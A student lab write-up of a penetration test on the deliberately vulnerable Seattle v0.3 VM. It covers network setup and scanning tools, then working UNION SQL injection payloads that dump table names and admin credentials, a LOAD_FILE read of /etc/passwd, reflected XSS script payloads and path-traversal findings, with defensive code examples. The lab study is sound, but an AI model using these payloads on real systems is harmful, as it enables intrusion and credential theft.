PROJECT BASED LEARNING
SEATTLE: V0.3 (Vulnhub)
What is Seattle: V0.3?
Graceful's VulnVM is a web application running on a virtual machine. It is designed to simulate a simple eCommerce-style website that is purposely vulnerable to a number of well-known security issues commonly seen in web applications.
Source machine: the Vulnhub page for Seattle: V0.3 (screenshot of its main page in the original post)
Network machine (Mikrotik)
Source machine: https://mikrotik.com/download (x86)
Topic of PBL:
Vulnerability Assessment on a Web Server
Learning outcomes:
- Understand the importance of network and operating system security
- Understand the importance of application and service security
- Understand the importance of patch management
- Understand and be able to perform vulnerability assessment as part of ethical hacking
- Understand web application and database (SQL) security
Constraints:
Most VMs downloaded from the internet expect to receive an IP address from a DHCP server, so the lab network needs a DHCP server as well as the target VM; here the Mikrotik RouterOS VM provides it.
Tools:
1. VirtualBox
2. Target machine (Vulnhub)
3. Kali Linux or another Linux distribution (assessment tools)
Topology: (diagram in the original post)
Networking steps:
A. Download
1. Download the RouterOS image from Mikrotik (link above).
2. Install and run it in VirtualBox (or another hypervisor). Do not forget to configure its network adapters:
A. NAT => to get internet access
B. Host-only Adapter => for Winbox configuration
- IP => 192.168.56.1
- Subnet mask => 255.255.255.0
C. Internal Network => to share the internet connection from the RouterOS machine with the lab VMs
3. In Winbox there are three interfaces, one per adapter. (screenshot in the original post)
4. Address assigned to the internal-network (LAN) interface = 192.168.10.10/24
Address obtained on the internet side = 10.0.2.15/24 (the VirtualBox NAT adapter)
5. DHCP Client: the interface used is the NAT (internet) one
IP -> DHCP Client
6. DHCP Server: hands out addresses automatically on the interface used for LAN1 (the shared network)
IP -> DHCP Server
7. To give internet access to the addresses handed out by the DHCP server, add a masquerade (source NAT) rule on the internet-facing interface
IP -> Firewall -> NAT
8. Ping from Winbox (New Terminal) to confirm the router itself is connected to the internet
9. Open Kali Linux (or another Linux machine) on the internal network; it receives its address from the RouterOS DHCP server, here 192.168.10.8
Pentesting steps:
A. Connecting
1. Log in on the "Seattle" machine (enter its username and password), then type "ifconfig" to find its IP address.
2. Ping that address from the Linux machine. If it is reachable, type the address in your browser's URL bar and you should see the web shop. In the rest of this write-up the target is 192.168.56.107 (later screenshots use 192.168.56.108).
B. Information Gathering
Information gathering is the process of collecting information about a target, such as a computer system, network or organization, to identify weaknesses that an attacker could exploit.
- WhatWeb
WhatWeb is an open-source web scanner that fingerprints the technologies used by a website: server software, frameworks and content management systems, e-mail addresses found in the pages, and the rest of the technology stack.
Here it reported the software stack the site uses, including the PHP and Apache versions. (output in the original post)

C. Enumeration
Enumeration is the process of gathering specific information about a target, such as the operating system, the services running and the open ports, to further assess its security posture.
- Dirsearch
Dirsearch is an open-source directory scanner used to find hidden directories and files on websites. It brute-forces paths from a wordlist (not every possible combination of characters) and reports those that exist but are not linked from the site.
Here it found several hidden directories and paths that can be accessed directly. (output in the original post)

Path Traversal
Severity: High (9.8) (note: under CVSS v3.x a 9.8 falls in the Critical band)
Path traversal, also known as directory traversal or ../ (dot dot slash), is an attack that lets an attacker read directories and files outside the directory the application intended to expose, by supplying path components such as ../ in a file name parameter.
(result in the original post)
- DirBuster
DirBuster is OWASP's directory brute-forcing tool; it does the same job as Dirsearch with a graphical interface and its own wordlists, and can be customised to your needs.
Exposed Administrative Interface
Severity: Medium (5.3)
An exposed administrative interface (admin panel, management console) is a page for managing and configuring the application that is reachable by anyone who knows its URL instead of being restricted to administrators.
Path: /admin
URL: 192.168.56.107/account.php?login=session
LFI Attack
Severity: High (9.8)
A Local File Inclusion (LFI) attack lets an attacker make the web server include, and therefore read or execute, files from its own filesystem. It works by exploiting missing input validation in the parameter a web application uses to choose which file to include.
We got a file back. (screenshot in the original post)
Looking through its source, I saw a reference to /connection.php, so I requested that file through the same inclusion and from it got config.php.
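The traversal and inclusion findings above come down to one coding mistake: a file name taken from the request is joined onto a base directory and opened without checking where the resulting path ends up. The added example below is my code, not part of the original post or of the Seattle application. It builds a throw-away directory tree standing in for the web root plus a file outside it, shows the vulnerable read leaking that file through ../ segments, and shows the usual fix: resolve the final path with realpath and refuse anything that is not under the base directory. The directory layout, file names and function names are constructed for the example.

```python
import os
import tempfile


def make_lab():
    """Constructed layout for the example: a web root holding one legitimately
    downloadable file, and a 'passwd' file two levels above it standing in for
    /etc/passwd (the file the page reads via traversal)."""
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "www", "downloads")
    os.makedirs(webroot)
    with open(os.path.join(webroot, "brochure.txt"), "w") as f:
        f.write("public brochure\n")
    with open(os.path.join(root, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    return root, webroot


def read_vulnerable(webroot, item):
    """Mirrors readfile($base . $_GET['item']): the request value is appended
    to the base directory and opened as-is, so '..' segments walk out of it."""
    with open(os.path.join(webroot, item)) as f:
        return f.read()


def read_hardened(webroot, item):
    """Resolve symlinks and '..' first, then require the result to stay inside
    the base directory. An absolute item ('/etc/passwd') is rejected too:
    os.path.join discards the base when the second part is absolute, and the
    containment check then fails."""
    base = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(base, item))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"traversal blocked: {item!r}")
    with open(target) as f:
        return f.read()


def demo():
    """Run both readers against a benign request and several traversal attempts."""
    _root, webroot = make_lab()
    results = {"legit": read_vulnerable(webroot, "brochure.txt").strip(),
               "traversal": read_vulnerable(webroot, "../../passwd").strip()}
    for name in ("../../passwd", "/etc/passwd", "brochure.txt/../../../passwd"):
        try:
            read_hardened(webroot, name)
            results[name] = "leaked"
        except PermissionError:
            results[name] = "blocked"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:32} {value}")
```

The realpath step matters more than the string check: filtering "../" from the input is bypassed by encoded or doubled variants, whereas comparing the resolved path against the resolved base catches every form, including symlinks that point outside the root.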
- Nmap
Nmap is an open-source network scanning tool used to discover hosts and services on a computer network. It can be used for:
Host discovery: finding active hosts on a network.
Service discovery: finding services running on active hosts.
Operating system detection: determining the operating system of active hosts.
Vulnerability scanning: identifying known security weaknesses on active hosts with its NSE scripts.
Note:
-sV = probe open ports to determine the service and version running on them
-sC = run the default set of NSE scripts
-Pn = skip host discovery and treat the host as alive (useful when ping is blocked)
-A = aggressive scan: enables OS detection, version detection, script scanning and traceroute
-sS = TCP SYN (half-open) scan: sends a SYN to each target port and judges its state from the reply without completing the handshake (needs root)
D. Vulnerability Assessment
- Nikto
Nikto is an open-source web server scanner that checks a web server for dangerous files, outdated server software and known misconfigurations. (output in the original post)
E. Information Disclosure
Information disclosure is a situation in which sensitive or confidential information is revealed unintentionally: personal data, financial information, corporate secrets or, as here, server configuration details.
URL: 192.168.56.107/info.php
PHP INFORMATION
Note: this page exposes phpinfo(), and the PHP configuration it shows tells us which file-inclusion attacks are likely to work against the PHP pages:
- allow_url_fopen=On: PHP's file functions can open remote URLs. This does not by itself create LFI (an include of an unvalidated local path needs neither setting), but it widens what a vulnerable file function can reach.
- allow_url_include=Off: include/require cannot load remote URLs, so RFI is not possible here.
- display_errors=Off: PHP's own errors are not shown in responses, so the application leaks less through error messages.
- include_path: .:/usr/share/pear:/usr/share/php: this only affects where relative include() names are searched; absolute paths and ../ traversal are not restricted by it, so LFI is not confined to these directories.
F. SQL Injection (Blind)
Blind SQL Injection is a type of SQL injection in which the attacker cannot see the query's output directly and instead infers it from side channels: a difference in the HTTP response (boolean-based) or in the response time (time-based).
We will check the Vinyl tab, which loads /products.php, for this weakness.
Intercept the request with Burp Suite and save it to file.txt (sqlmap reads it with -r).
Search the database name with sqlmap.
Dump the passwords with sqlmap.
List the column names in table tblMembers.
Dump the usernames with sqlmap as well.
G. SQL Injection (Error-Based)
Error-based SQL injection is a type of SQL injection in which the attacker uses the error messages generated by the database server to extract information from the database. Note that the payloads below actually use the UNION technique: the injected SELECT's results are printed in the page, so no error message is needed; the single-quote test is only how the injection point was first spotted.
We use a reference list of SQL injection payloads.
Example payload
Vinyl path
192.168.56.107/products.php?type=1
In the Vinyl tab we found a possible SQL injection.
If we open the product detail and add a ' to the URL like this:
192.168.56.107/details.php?prod=1'&type=1
We try another payload, which confirms that the original SELECT returns five columns:
type=1+UNION+SELECT+1,2,3,4,5--+-

So we can start extracting data from there. Let's extract!
Try another payload, which returns the MySQL version in the third column (the one the page prints):
type=1+UNION+SELECT+1,2,version(),4,5--+-
Try another payload again, for the name of the current database:
http://192.168.56.107/products.php?type=1+UNION+SELECT+1,2,database(),4,5--+-
I used a SQL injection reference to go further.
Payload to list the tables in the current database:
type=1+UNION+SELECT+1,2,table_name,4,5+FROM+information_schema.tables+WHERE+table_schema=database()--+-
Payload to list the columns of those tables:
type=1+UNION+SELECT+1,2,column_name,4,5+FROM+information_schema.columns+WHERE+table_schema=database()--+-


Finally, three of them are very interesting: id, username and password.
Knowing the tables and columns of the seattle database, we can get the username and password.
Payloads to get the username and password:
type=1+UNION+SELECT+1,2,username,4,5+FROM+tblMembers--+-
type=1+UNION+SELECT+1,2,password,4,5+FROM+tblMembers--+-
Username
admin@seattlesounds.net
Password
Assasin1
Then we log in with those credentials.
Note: the same injection works on the /clothing path and returns the same credentials :)
Read File with SQL Injection
We can also read /etc/passwd through the SQL injection with LOAD_FILE() and get the same result as with path traversal. This requires the MySQL user to have the FILE privilege and secure_file_priv to permit the path; that it works here is a finding in itself.
Payload:
type=2+UNION+SELECT+1,2,LOAD_FILE('/etc/passwd'),4,5--+-

Reflected XSS (Admin)
Reflected cross-site scripting (XSS) is an XSS variant in which the malicious script is reflected back to the victim's browser in the response to their own request. It happens when a web application takes input from the user (here a URL parameter) and includes it in the response without encoding it for the HTML context it lands in.
Reflected XSS discovered in the author parameter of blog.php:
In the URL http://192.168.56.107/blog.php?author=
add the payload
"><script>alert("whateveryouwant")</script>'
and the alert fires. (screenshot in the original post)
Reflected XSS (User)
I wondered what if i do xss attack as user or guest account not as admin account, so i decided to try XSS attack with the same way with url:
http://192.168.56.108/blog.php
In that path, i was wondering, what if i add parameter "author=" with no admin account, so i added that parameter into url like this;
http://192.168.56.108/blog.php?author=
So. i try do xss with the same way like this, and this successfully :)
Example 01
Example02
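The admin and user cases above behave the same because the flaw is in how blog.php writes the author value into the page, not in who is logged in. The added example below is my code, not part of the original post or of the Seattle application. It models the reflection with the author parameter landing inside a quoted HTML attribute (an assumption: the page's payload opens with "> as if closing such an attribute, but the original template is not shown), runs the page's own payload through a vulnerable and an escaped rendering, and includes the canary check a tester uses to spot an unescaped reflection before trying a full payload. The markup and the function names are constructed for the example; the URL is the one from the write-up.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# The payload used on the page, and the target path from the write-up.
PAYLOAD = '"><script>alert("whateveryouwant")</script>\''
BLOG = "http://192.168.56.107/blog.php"


def payload_url(value, base=BLOG):
    """Build blog.php?author=<value> with the value URL-encoded."""
    return base + "?author=" + quote(value, safe="")


def author_from(url):
    """Pull ?author= out of a URL the way $_GET['author'] would."""
    return parse_qs(urlsplit(url).query).get("author", [""])[0]


def blog_vulnerable(url):
    """Assumed template: the value is echoed into a quoted attribute unescaped,
    so a leading "> closes the tag and the rest of the payload becomes markup."""
    return f'<input type="text" name="author" value="{author_from(url)}">'


def blog_hardened(url):
    """Same template with HTML-entity encoding; quote=True also encodes the
    double quote, which is what keeps the value inside the attribute."""
    return (f'<input type="text" name="author" '
            f'value="{html.escape(author_from(url), quote=True)}">')


def is_reflected_unescaped(render, canary='zz"><zz>'):
    """Canary test: send a harmless string containing the characters an XSS
    payload needs (" > <) and check whether they come back untouched."""
    return canary in render(payload_url(canary))


if __name__ == "__main__":
    url = payload_url(PAYLOAD)
    print(blog_vulnerable(url))
    print(blog_hardened(url))
    print("vulnerable reflects:", is_reflected_unescaped(blog_vulnerable))
    print("hardened reflects:", is_reflected_unescaped(blog_hardened))
```

The canary is what a tester sends first: if the quote and angle brackets come back verbatim the page is exploitable and the full payload is only a confirmation, whereas a page that returns &quot; and &gt; is encoding its output and needs a different approach (or is not vulnerable in that context).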
Conclusion:
Pentesting the machine turned up a number of weaknesses. The vulnerabilities present on Seattle v0.3 are:
- SQL Injection (Error-based)
- SQL Injection (Blind)
- Reflected Cross-Site Scripting
- Stored Cross-Site Scripting
- Insecure Direct Object Reference
- Username Enumeration
- Path Traversal
- Exposed phpinfo()
- Exposed Administrative Interface
- Weak Admin Credentials
Of these, the SQL injection variants, reflected XSS, path traversal, the exposed phpinfo() page and the exposed administrative interface were demonstrated above; stored XSS, IDOR, username enumeration and weak admin credentials were not exercised in this write-up.
THANK YOU FOR READING :) Stay healthy and keep strong!!!